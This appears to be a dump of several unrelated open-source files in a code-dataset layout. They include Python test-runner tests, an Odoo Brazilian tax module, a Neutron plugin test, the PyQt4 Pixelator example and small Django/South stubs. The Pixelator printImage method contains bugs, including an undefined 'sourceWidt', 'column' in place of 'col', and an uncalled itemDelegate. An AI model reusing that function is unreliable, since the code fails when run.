self.assertEqual(results['metadata']['expectations_files'],
['expectations.txt'])
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
self.assertEqual(results['metadata']['tags'], ['foo', 'bar'])
def test_skip_test_with_expectations_file_skip_expectation(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar
# bat
# ]
# results: [ skip ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Skip ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'foo'],
files=files, ret=0, err='')
self.assertIn('[1/1] fail_test.FailingTest.test_fail was skipped\n',
out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['fail_test']['FailingTest']['test_fail']
self.assertEqual(results['actual'],'SKIP')
self.assertEqual(results['expected'],'SKIP')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_skip_test_with_expectations_file_skip_with_cmd_args(self):
files = {'pass_test.py': PASS_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar ]
# results: [ Pass ]
crbug.com/12345 [ foo ] pass_test.PassingTest.test_pass [ Pass ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'foo',
'--skip', '*test_pass'],
files=files, ret=0, err='')
self.assertIn('[1/1] pass_test.PassingTest.test_pass was skipped\n',
out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['pass_test']['PassingTest']['test_pass']
self.assertEqual(results['actual'],'SKIP')
self.assertEqual(results['expected'],'SKIP')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_skip_test_no_expectations_file(self):
files = {'skip_test.py': SKIP_TEST_PY}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json'],
files=files, ret=0, err='')
self.assertIn('[1/1] skip_test.SkipTest.test_skip was skipped\n', out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['skip_test']['SkipTest']['test_skip']
self.assertEqual(results['actual'],'SKIP')
self.assertEqual(results['expected'],'SKIP')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_skip_test_no_expectations_file_cmd_args_skip(self):
files = PASS_TEST_FILES
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'--skip','*test_pass'],
files=files, ret=0, err='')
self.assertIn('[1/1] pass_test.PassingTest.test_pass was skipped\n',
out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['pass_test']['PassingTest']['test_pass']
self.assertEqual(results['actual'],'SKIP')
self.assertEqual(results['expected'],'SKIP')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_relative_paths_used_for_expectations_files_in_metadata(self):
test_expectations = (
'# tags: [ foo bar ]\n'
'# results: [ Failure ]\n'
'crbug.com/12345 [ foo ] test_dir.failing_test.FailingTest.test_fail '
'[ Failure ]\n')
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json', 'src/test_dir',
'-X', 'src/test_dir/test_expectations/test_expectations.txt',
'-x', 'foo', '--repository-absolute-path', 'src/'],
ret=0, err='', files={
'src/test_dir/failing_test.py': FAIL_TEST_PY,
('src/test_dir/test_expectations'
'/test_expectations.txt'): test_expectations,
'src/test_dir/__init__.py': ''
})
self.assertIn(
' test_dir.failing_test.FailingTest.test_fail failed', out)
results = json.loads(files['full_results.json'])
self.assertEqual(
['/'.join(['', '', 'test_dir', 'test_expectations', 'test_expectations.txt'])],
results['metadata']['expectations_files'])
def test_implement_test_name_prefix_exclusion_in_finished_test_output(self):
files = PASS_TEST_FILES
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'pass_test.PassingTest.'],
files=files, ret=0, err='')
self.assertIn('[1/1] test_pass passed\n', out)
def test_implement_test_name_prefix_exclusion_in_test_filter(self):
files = OUTPUT_TEST_FILES
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'output_test.',
'--test-filter', '*test_out'],
files=files, ret=0, err='')
results = json.loads(files['full_results.json'])
self.assertEqual(len(results['tests']), 1)
self.assertIn('[1/1] PassTest.test_out passed\n', out)
def test_implement_test_name_prefix_exclusion_in_expectations_files(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar ]
# results: [ Failure ]
crbug.com/12345 [ foo ] test_fail [ Failure ]
""")}
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'fail_test.FailingTest.',
'-X', 'expectations.txt', '-x', 'foo', '-vv'],
files=files, ret=0, err='')
self.assertIn('[1/1] test_fail failed as expected:\n', out)
def test_implement_test_name_prefix_exclusion_in_skip_glob(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.','--skip',
'test_*'], files=files, ret=0, err='')
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
def test_implement_test_name_prefix_exclusion_in_json_results(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.',
'--write-full-results-to', 'full_results.json'],
files=files, ret=1, err='')
results = json.loads(files['full_results.json'])
self.assertEqual(results['tests']['test_fail']['actual'], 'FAIL')
# also test if the test_name_prefix key value pair is in the JSON results
self.assertEqual(results['metadata']['test_name_prefix'], 'fail_test.FailingTest.')
def test_implement_test_name_prefix_exclusion_in_trace_results(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.',
'--write-trace-to', 'full_trace.json'],
files=files, ret=1, err='')
trace = json.loads(files['full_trace.json'])
self.assertEqual(trace['traceEvents'][0]['name'], 'test_fail')
# also test if the test_name_prefix key value pair is in the JSON results
self.assertEqual(
trace['otherData']['test_name_prefix'], 'fail_test.FailingTest.')
def test_test_name_prefix_is_optional_field_in_json_results(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json'],
files=files, ret=1, err='')
results = json.loads(files['full_results.json'])
self.assertNotIn('test_name_prefix', results)
def test_implement_test_name_prefix_exclusion_for_tests_args(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['test_fail',
'--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'fail_test.FailingTest.'],
files=files, ret=1, err='')
self.assertIn('0 tests passed, 0 skipped, 1 failure.', out)
def test_implement_test_name_prefix_exclusion_for_file_list_arg(self):
test_list = ('test_fail\n')
files = {'fail_test.py': FAIL_TEST_PY,
'test_list.txt': test_list}
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'fail_test.FailingTest.',
'-f', 'test_list.txt'],
files=files, ret=1, err='')
self.assertIn('0 tests passed, 0 skipped, 1 failure.', out)
def test_artifacts_added_for_retries(self):
files = {'artifacts_test.py': ARTIFACTS_TEST_PY}
_, out, err, files = self.check(
['--test-name-prefix', 'artifacts_test.ArtifactTest.',
'--write-full-results-to', 'full_results.json', '--retry-limit=1'],
files=files, ret=1, err='')
results = json.loads(files['full_results.json'])
artifacts = results['tests']['test_produce_artifact_for_retries']['artifacts']
self.assertEqual(artifacts['artifact_name'], [
os.path.join('test_produce_artifact_for_retries', 'test.txt'),
os.path.join('test_produce_artifact_for_retries',
'retry_1', 'test.txt')])
self.assertIn(
os.path.join('artifacts', 'test_produce_artifact_for_retries',
'test.txt'), files)
self.assertIn(
os.path.join('artifacts', 'test_produce_artifact_for_retries',
'retry_1', 'test.txt'), files)
def test_matches_partial_filter(self):
_, out, _, files = self.check(
['--test-name-prefix', 'output_test.',
'--partial-match-filter', 'PassTest'],
files=OUTPUT_TEST_FILES, ret=0, err='')
self.assertIn('2 tests passed, 0 skipped, 0 failures.',out)
def test_test_prefix_exclusion_in_partial_filter_match(self):
_, out, _, files = self.check(
['--test-name-prefix', 'output_test.',
'--partial-match-filter', 'output_test.'],
files=OUTPUT_TEST_FILES, ret=0, err='')
self.assertIn('0 tests passed, 0 skipped, 0 failures.',out)
def test_implement_test_name_prefix_exclusion_in_test_started_output(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.', '-vvv',
'--overwrite'],
files=files, ret=1, err='')
self.assertIn('[0/1] test_fail queued\n', out)
self.assertIn('[0/1] test_fail\n', out)
def test_implement_test_name_prefix_exclusion_in_list_only_arg(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.', '--list-only'],
files=files, ret=0, err='')
self.assertIn('test_fail', out)
def test_verbose_2(self):
self.check(['-vv', '-j', '1', 'output_test.PassTest'],
files=OUTPUT_TEST_FILES, ret=0,
out=d("""\
[1/2] output_test.PassTest.test_err passed:
hello on stderr
[2/2] output_test.PassTest.test_out passed:
hello on stdout
2 tests passed, 0 skipped, 0 failures.
"""), err='')
def test_verbose_3(self):
self.check(['-vvv', '-j', '1', 'output_test.PassTest'],
files=OUTPUT_TEST_FILES, ret=0,
out=d("""\
[0/2] output_test.PassTest.test_err queued
[1/2] output_test.PassTest.test_err passed:
hello on stderr
[1/2] output_test.PassTest.test_out queued
[2/2] output_test.PassTest.test_out passed:
hello on stdout
2 tests passed, 0 skipped, 0 failures.
"""), err='')
def test_version(self):
self.check('--version', ret=0, out=(VERSION + '\n'))
def test_write_full_results_to(self):
_, _, _, files = self.check(['--write-full-results-to',
'results.json'], files=PASS_TEST_FILES)
self.assertIn('results.json', files)
results = json.loads(files['results.json'])
self.assertEqual(results['interrupted'], False)
self.assertEqual(results['path_delimiter'], '.')
# The time it takes to run the test varies, so we test that
# we got a single entry greater than zero, but then delete it from
# the result so we can do an exact match on the rest of the trie.
result = results['tests']['pass_test']['PassingTest']['test_pass']
self.assertEqual(len(result['times']), 1)
self.assertGreater(result['times'][0], 0)
result.pop('times')
self.assertEqual({u'pass_test': {
u'PassingTest': {
u'test_pass': {
u'actual': u'PASS',
u'expected': u'PASS',
}
}
}},
results['tests'])
def test_write_trace_to(self):
_, _, _, files = self.check(['--write-trace-to', 'trace.json'],
files=PASS_TEST_FILES)
self.assertIn('trace.json', files)
trace_obj = json.loads(files['trace.json'])
self.assertEqual(trace_obj['otherData'], {})
self.assertEqual(len(trace_obj['traceEvents']), 5)
event = trace_obj['traceEvents'][0]
self.assertEqual(event['name'], 'pass_test.PassingTest.test_pass')
self.assertEqual(event['ph'], 'X')
self.assertEqual(event['tid'], 1)
self.assertEqual(event['args']['expected'], ['PASS'])
self.assertEqual(event['args']['actual'], 'PASS')
def test_expected_failure_does_not_get_retried(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar
# bat
# ]
# results: [ Failure ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Failure ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'--retry-limit','3',
'-X', 'expectations.txt',
'-x', 'foo'],
files=files, ret=0, err='')
results = json.loads(files['full_results.json'])
result = results['tests']['fail_test']['FailingTest']['test_fail']
self.assertIn('test_fail failed as expected', out)
self.assertIn('0 tests passed, 0 skipped, 1 failure.', out)
self.assertNotIn('Retrying failed tests', out)
self.assertEqual(result['expected'], 'FAIL')
self.assertEqual(result['actual'], 'FAIL')
self.assertNotIn('is_unexpected', result)
class TestMain(TestCli):
prog = []
def make_host(self):
return Host()
def call(self, host, argv, stdin, env):
stdin = unicode(stdin)
host.stdin = io.StringIO(stdin)
if env:
host.getenv = env.get
host.capture_output()
orig_sys_path = sys.path[:]
orig_sys_modules = list(sys.modules.keys())
try:
ret = main(argv + ['-j', '1'], host)
finally:
out, err = host.restore_output()
modules_to_unload = []
for k in sys.modules:
if k not in orig_sys_modules:
modules_to_unload.append(k)
for k in modules_to_unload:
del sys.modules[k]
sys.path = orig_sys_path
return ret, out, err
def test_debugger(self):
# TODO: this test seems to hang under coverage.
pass
|
vrenaville/OCB | refs/heads/8.0 | addons/l10n_br/account.py | 340 | # -*- encoding: utf-8 -*-
#################################################################################
# #
# Copyright (C) 2009 Renato Lima - Akretion #
# #
#This program is free software: you can redistribute it and/or modify #
#it under the terms of the GNU Affero General Public License as published by #
#the Free Software Foundation, either version 3 of the License, or #
#(at your option) any later version. #
# #
#This program is distributed in the hope that it will be useful, #
#but WITHOUT ANY WARRANTY; without even the implied warranty of #
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#GNU General Public License for more details. #
# #
#You should have received a copy of the GNU General Public License #
#along with this program. If not, see <http://www.gnu.org/licenses/>. #
#################################################################################
import openerp
from openerp.osv import fields, osv
TAX_CODE_COLUMNS = {
'domain':fields.char('Domain',
help="This field is only used if you develop your own module allowing developers to create specific taxes in a custom domain."),
'tax_discount': fields.boolean('Discount this Tax in Prince',
help="Mark it for (ICMS, PIS, COFINS and others taxes included)."),
}
TAX_DEFAULTS = {
'base_reduction': 0,
'amount_mva': 0,
}
class account_tax_code_template(osv.osv):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax.code.template'
_columns = TAX_CODE_COLUMNS
def generate_tax_code(self, cr, uid, tax_code_root_id, company_id,
context=None):
"""This function generates the tax codes from the templates of tax
code that are children of the given one passed in argument. Then it
returns a dictionary with the mappping between the templates and the
real objects.
:param tax_code_root_id: id of the root of all the tax code templates
to process.
:param company_id: id of the company the wizard is running for
:returns: dictionary with the mappping between the templates and the
real objects.
:rtype: dict
"""
obj_tax_code_template = self.pool.get('account.tax.code.template')
obj_tax_code = self.pool.get('account.tax.code')
tax_code_template_ref = {}
company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)
#find all the children of the tax_code_root_id
children_tax_code_template = tax_code_root_id and obj_tax_code_template.search(cr, uid, [('parent_id','child_of',[tax_code_root_id])], order='id') or []
for tax_code_template in obj_tax_code_template.browse(cr, uid, children_tax_code_template, context=context):
parent_id = tax_code_template.parent_id and ((tax_code_template.parent_id.id in tax_code_template_ref) and tax_code_template_ref[tax_code_template.parent_id.id]) or False
vals = {
'name': (tax_code_root_id == tax_code_template.id) and company.name or tax_code_template.name,
'code': tax_code_template.code,
'info': tax_code_template.info,
'parent_id': parent_id,
'company_id': company_id,
'sign': tax_code_template.sign,
'domain': tax_code_template.domain,
'tax_discount': tax_code_template.tax_discount,
}
#check if this tax code already exists
rec_list = obj_tax_code.search(cr, uid, [('name', '=', vals['name']),
('parent_id','=',parent_id),
('code', '=', vals['code']),
('company_id', '=', vals['company_id'])], context=context)
if not rec_list:
#if not yet, create it
new_tax_code = obj_tax_code.create(cr, uid, vals)
#recording the new tax code to do the mapping
tax_code_template_ref[tax_code_template.id] = new_tax_code
return tax_code_template_ref
class account_tax_code(osv.osv):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax.code'
_columns = TAX_CODE_COLUMNS
def get_precision_tax():
def change_digit_tax(cr):
decimal_precision = openerp.registry(cr.dbname)['decimal.precision']
res = decimal_precision.precision_get(cr, 1, 'Account')
return (16, res+2)
return change_digit_tax
class account_tax_template(osv.osv):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax.template'
_columns = {
'tax_discount': fields.boolean('Discount this Tax in Prince',
help="Mark it for (ICMS, PIS e etc.)."),
'base_reduction': fields.float('Redution', required=True,
digits_compute=get_precision_tax(),
help="Um percentual decimal em % entre 0-1."),
'amount_mva': fields.float('MVA Percent', required=True,
digits_compute=get_precision_tax(),
help="Um percentual decimal em % entre 0-1."),
'type': fields.selection([('percent','Percentage'),
('fixed','Fixed Amount'),
('none','None'),
('code','Python Code'),
('balance','Balance'),
('quantity','Quantity')], 'Tax Type', required=True,
help="The computation method for the tax amount."),
}
_defaults = TAX_DEFAULTS
def _generate_tax(self, cr, uid, tax_templates, tax_code_template_ref, company_id, context=None):
"""
This method generate taxes from templates.
:param tax_templates: list of browse record of the tax templates to process
:param tax_code_template_ref: Taxcode templates reference.
:param company_id: id of the company the wizard is running for
:returns:
{
'tax_template_to_tax': mapping between tax template and the newly generated taxes corresponding,
'account_dict': dictionary containing a to-do list with all the accounts to assign on new taxes
}
"""
result = super(account_tax_template, self)._generate_tax(cr, uid,
tax_templates,
tax_code_template_ref,
company_id,
context)
tax_templates = self.browse(cr, uid, result['tax_template_to_tax'].keys(), context)
obj_acc_tax = self.pool.get('account.tax')
for tax_template in tax_templates:
if tax_template.tax_code_id:
obj_acc_tax.write(cr, uid, result['tax_template_to_tax'][tax_template.id], {'domain': tax_template.tax_code_id.domain,
'tax_discount': tax_template.tax_code_id.tax_discount})
return result
def onchange_tax_code_id(self, cr, uid, ids, tax_code_id, context=None):
result = {'value': {}}
if not tax_code_id:
return result
obj_tax_code = self.pool.get('account.tax.code.template').browse(cr, uid, tax_code_id)
if obj_tax_code:
result['value']['tax_discount'] = obj_tax_code.tax_discount
result['value']['domain'] = obj_tax_code.domain
return result
class account_tax(osv.osv):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax'
_columns = {
'tax_discount': fields.boolean('Discount this Tax in Prince',
help="Mark it for (ICMS, PIS e etc.)."),
'base_reduction': fields.float('Redution', required=True,
digits_compute=get_precision_tax(),
help="Um percentual decimal em % entre 0-1."),
'amount_mva': fields.float('MVA Percent', required=True,
digits_compute=get_precision_tax(),
help="Um percentual decimal em % entre 0-1."),
'type': fields.selection([('percent','Percentage'),
('fixed','Fixed Amount'),
('none','None'),
('code','Python Code'),
('balance','Balance'),
('quantity','Quantity')], 'Tax Type', required=True,
help="The computation method for the tax amount."),
}
_defaults = TAX_DEFAULTS
def onchange_tax_code_id(self, cr, uid, ids, tax_code_id, context=None):
result = {'value': {}}
if not tax_code_id:
return result
obj_tax_code = self.pool.get('account.tax.code').browse(cr, uid, tax_code_id)
if obj_tax_code:
result['value']['tax_discount'] = obj_tax_code.tax_discount
result['value']['domain'] = obj_tax_code.domain
return result
|
uni2u/neutron | refs/heads/master | neutron/tests/unit/nuage/test_netpartition.py | 14 | # Copyright 2014 Alcatel-Lucent USA Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import uuid
import webob.exc
from neutron import manager
from neutron.plugins.nuage.extensions import netpartition as netpart_ext
from neutron.tests.unit.nuage import test_nuage_plugin
from neutron.tests.unit import test_extensions
class NetPartitionTestExtensionManager(object):
def get_resources(self):
return netpart_ext.Netpartition.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class NetPartitionTestCase(test_nuage_plugin.NuagePluginV2TestCase):
def setUp(self):
ext_mgr = NetPartitionTestExtensionManager()
super(NetPartitionTestCase, self).setUp()
self.ext_api = test_extensions.setup_extensions_middleware(ext_mgr)
def _make_netpartition(self, fmt, name):
data = {
'net_partition': {
'name': name,
'tenant_id': uuid.uuid4()
}
}
netpart_req = self.new_create_request('net-partitions', data, fmt)
resp = netpart_req.get_response(self.ext_api)
if resp.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=resp.status_int)
return self.deserialize(fmt, resp)
def _del_netpartition(self, id):
self._delete('net-partitions', id)
@contextlib.contextmanager
def netpartition(self, name='netpartition1',
do_delete=True,
fmt=None,
**kwargs):
netpart = self._make_netpartition(fmt or self.fmt, name)
yield netpart
if do_delete:
self._del_netpartition(netpart['net_partition']['id'])
def test_create_netpartition(self):
name = 'netpart1'
keys = [('name', name)]
with self.netpartition(name=name) as netpart:
for k, v in keys:
self.assertEqual(netpart['net_partition'][k], v)
def test_delete_netpartition(self):
name = 'netpart1'
netpart = self._make_netpartition(self.fmt, name)
req = self.new_delete_request('net-partitions',
netpart['net_partition']['id'])
res = req.get_response(self.ext_api)
self.assertEqual(res.status_int, webob.exc.HTTPNoContent.code)
def test_show_netpartition(self):
with self.netpartition(name='netpart1') as npart:
req = self.new_show_request('net-partitions',
npart['net_partition']['id'])
res = self.deserialize(self.fmt, req.get_response(self.ext_api))
self.assertEqual(res['net_partition']['name'],
npart['net_partition']['name'])
def test_create_existing_default_netpartition(self):
name = 'default_test_np'
netpart1 = self._make_netpartition(self.fmt, name)
nuage_plugin = manager.NeutronManager.get_plugin()
netpart2 = nuage_plugin._create_default_net_partition(name)
self.assertEqual(netpart1['net_partition']['name'],
netpart2['name'])
|
AlexDoul/PyQt4 | refs/heads/master | examples/itemviews/pixelator/pixelator.py | 2 | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2010 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
# These are only needed for Python v2 but are harmless for Python v3.
import sip
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
from PyQt4 import QtCore, QtGui
try:
import pixelator_rc3
except ImportError:
import pixelator_rc2
ItemSize = 256
class PixelDelegate(QtGui.QAbstractItemDelegate):
def __init__(self, parent=None):
super(PixelDelegate, self).__init__(parent)
self.pixelSize = 12
def paint(self, painter, option, index):
if option.state & QtGui.QStyle.State_Selected:
painter.fillRect(option.rect, option.palette.highlight())
size = min(option.rect.width(), option.rect.height())
brightness = index.model().data(index, QtCore.Qt.DisplayRole)
radius = (size/2.0) - (brightness/255.0 * size/2.0)
if radius == 0.0:
return
painter.save()
painter.setRenderHint(QtGui.QPainter.Antialiasing)
painter.setPen(QtCore.Qt.NoPen)
if option.state & QtGui.QStyle.State_Selected:
painter.setBrush(option.palette.highlightedText())
else:
painter.setBrush(QtGui.QBrush(QtCore.Qt.black))
painter.drawEllipse(QtCore.QRectF(
option.rect.x() + option.rect.width()/2 - radius,
option.rect.y() + option.rect.height()/2 - radius,
2*radius, 2*radius))
painter.restore()
def sizeHint(self, option, index):
return QtCore.QSize(self.pixelSize, self.pixelSize)
def setPixelSize(self, size):
self.pixelSize = size
class ImageModel(QtCore.QAbstractTableModel):
def __init__(self, parent=None):
super(ImageModel, self).__init__(parent)
self.modelImage = QtGui.QImage()
def setImage(self, image):
self.modelImage = QtGui.QImage(image)
self.reset()
def rowCount(self, parent):
return self.modelImage.height()
def columnCount(self, parent):
return self.modelImage.width()
def data(self, index, role):
if not index.isValid() or role != QtCore.Qt.DisplayRole:
return None
return QtGui.qGray(self.modelImage.pixel(index.column(), index.row()))
def headerData(self, section, orientation, role):
if role == QtCore.Qt.SizeHintRole:
return QtCore.QSize(1, 1)
return None
class MainWindow(QtGui.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.currentPath = QtCore.QDir.homePath()
self.model = ImageModel(self)
centralWidget = QtGui.QWidget()
self.view = QtGui.QTableView()
self.view.setShowGrid(False)
self.view.horizontalHeader().hide()
self.view.verticalHeader().hide()
self.view.horizontalHeader().setMinimumSectionSize(1)
self.view.verticalHeader().setMinimumSectionSize(1)
self.view.setModel(self.model)
delegate = PixelDelegate(self)
self.view.setItemDelegate(delegate)
pixelSizeLabel = QtGui.QLabel("Pixel size:")
pixelSizeSpinBox = QtGui.QSpinBox()
pixelSizeSpinBox.setMinimum(4)
pixelSizeSpinBox.setMaximum(32)
pixelSizeSpinBox.setValue(12)
fileMenu = QtGui.QMenu("&File", self)
openAction = fileMenu.addAction("&Open...")
openAction.setShortcut("Ctrl+O")
self.printAction = fileMenu.addAction("&Print...")
self.printAction.setEnabled(False)
self.printAction.setShortcut("Ctrl+P")
quitAction = fileMenu.addAction("E&xit")
quitAction.setShortcut("Ctrl+Q")
helpMenu = QtGui.QMenu("&Help", self)
aboutAction = helpMenu.addAction("&About")
self.menuBar().addMenu(fileMenu)
self.menuBar().addSeparator()
self.menuBar().addMenu(helpMenu)
openAction.triggered.connect(self.chooseImage)
self.printAction.triggered.connect(self.printImage)
quitAction.triggered.connect(QtGui.qApp.quit)
aboutAction.triggered.connect(self.showAboutBox)
pixelSizeSpinBox.valueChanged.connect(delegate.setPixelSize)
pixelSizeSpinBox.valueChanged.connect(self.updateView)
controlsLayout = QtGui.QHBoxLayout()
controlsLayout.addWidget(pixelSizeLabel)
controlsLayout.addWidget(pixelSizeSpinBox)
controlsLayout.addStretch(1)
mainLayout = QtGui.QVBoxLayout()
mainLayout.addWidget(self.view)
mainLayout.addLayout(controlsLayout)
centralWidget.setLayout(mainLayout)
self.setCentralWidget(centralWidget)
self.setWindowTitle("Pixelator")
self.resize(640, 480)
def chooseImage(self):
fileName = QtGui.QFileDialog.getOpenFileName(self, "Choose an Image",
self.currentPath, '*')
if fileName:
self.openImage(fileName)
def openImage(self, fileName):
image = QtGui.QImage()
if image.load(fileName):
self.model.setImage(image)
if not fileName.startswith(':/'):
self.currentPath = fileName
self.setWindowTitle("%s - Pixelator" % self.currentPath)
self.printAction.setEnabled(True)
self.updateView()
def printImage(self):
if self.model.rowCount(QtCore.QModelIndex()) * self.model.columnCount(QtCore.QModelIndex()) > 90000:
answer = QtGui.QMessageBox.question(self, "Large Image Size",
"The printed image may be very large. Are you sure that "
"you want to print it?",
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
if answer == QtGui.QMessageBox.No:
return
printer = QtGui.QPrinter(QtGui.QPrinter.HighResolution)
dlg = QtGui.QPrintDialog(printer, self)
dlg.setWindowTitle("Print Image")
if dlg.exec_() != QtGui.QDialog.Accepted:
return
painter = QtGui.QPainter()
painter.begin(printer)
rows = self.model.rowCount(QtCore.QModelIndex())
columns = self.model.columnCount(QtCore.QModelIndex())
sourceWidth = (columns+1) * ItemSize
sourceHeight = (rows+1) * ItemSize
painter.save()
xscale = printer.pageRect().width() / float(sourceWidth)
yscale = printer.pageRect().height() / float(sourceHeight)
scale = min(xscale, yscale)
painter.translate(printer.pageRect().x()+printer.pageRect().width()/2,
printer.pageRect().y()+printer.pageRect().height()/2)
painter.scale(scale, scale)
painter.translate(-sourceWidt/2, -sourceHeight/2)
option = QtGui.QStyleOptionViewItem()
parent = QtCore.QModelIndex()
progress = QtGui.QProgressDialog("Printing...", "Cancel", 0, rows,
self)
y = ItemSize / 2.0
for row in range(rows):
progress.setValue(row)
QtGui.qApp.processEvents()
if progress.wasCanceled():
break
x = ItemSize / 2.0
for col in range(columns):
option.rect = QtCore.QRect(x, y, ItemSize, ItemSize)
self.view.itemDelegate.paint(painter, option,
self.model.index(row, column, parent))
x = x + ItemSize
y = y + ItemSize
progress.setValue(rows)
painter.restore()
painter.end()
if progress.wasCanceled():
QtGui.QMessageBox.information(self, "Printing canceled",
"The printing process was canceled.",
QtGui.QMessageBox.Cancel)
def showAboutBox(self):
QtGui.QMessageBox.about(self, "About the Pixelator example",
"This example demonstrates how a standard view and a custom\n"
"delegate can be used to produce a specialized "
"representation\nof data in a simple custom model.")
def updateView(self):
self.view.resizeColumnsToContents()
self.view.resizeRowsToContents()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
window = MainWindow()
window.show()
window.openImage(':/images/qt.png')
sys.exit(app.exec_())
|
drawquest/drawquest-web | refs/heads/master | website/apps/canvas_auth/migrations/0001_initial.py | 2 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
pass
def backwards(self, orm):
pass
models = {
}
complete_apps = ['canvas_auth']
|
bodedev/prospera | refs/heads/master | plataforma/tests.py | 873 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
# Create your tests here.
|
eudoxos/woodem | refs/heads/master | py/apiversion.py | 3 | # encoding: utf-8
import woo.core
###
### Set API version here. Usually something like
###
### major × 10000 + minor × 100 + API revision
###
